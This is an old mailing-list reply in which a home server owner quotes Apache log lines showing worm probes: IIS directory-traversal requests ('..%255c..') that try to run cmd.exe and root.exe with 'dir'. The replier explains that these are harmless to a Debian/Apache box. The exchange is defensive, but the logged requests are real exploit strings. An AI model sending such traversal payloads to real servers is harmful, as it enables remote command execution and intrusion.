OSS> We just got our ADSL and now have a server running Apache on a potato box OSS> at home. DynDNS provides us with dynamic dns.
OSS> Today I found these lines in my acces.log: OSS> 213.133.35.205 - - [29/Oct/2001:12:54:40 +0100] "GET /scripts/root.exe?/c+dir HT OSS> TP/1.0" 404 210 OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /MSADC/root.exe?/c+dir HTTP OSS> /1.0" 404 208 OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /c/winnt/system32/cmd.exe?/ OSS> c+dir HTTP/1.0" 404 218 OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /d/winnt/system32/cmd.exe?/ OSS> c+dir HTTP/1.0" 404 218 OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /scripts/..%255c../winnt/sy OSS> stem32/cmd.exe?/c+dir HTTP/1.0" 404 232 OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /_vti_bin/..%255c../..%255c OSS> ../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 OSS> 213.133.35.205 - - [29/Oct/2001:12:54:41 +0100] "GET /_mem_bin/..%255c../..%255c OSS> ../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 OSS> and so on. To me it looks as if 213.145.168.244 is trying OSS> to execute some file giving him root access. Are someone trying to OSS> crack my machine? What should I do? Ignore it. It is a worm which tries to hack IIS. Since you running Debian + Apache you are hardly in danger. -- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- | Ilya Martynov (http://martynov.org/) | | GnuPG 1024D/323BDEE6 D7F7 561E 4C1D 8A15 8E80 E4AE BE1A 53EB 323B DEE6 | | AGAVA Software Company (http://www.agava.com/) | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-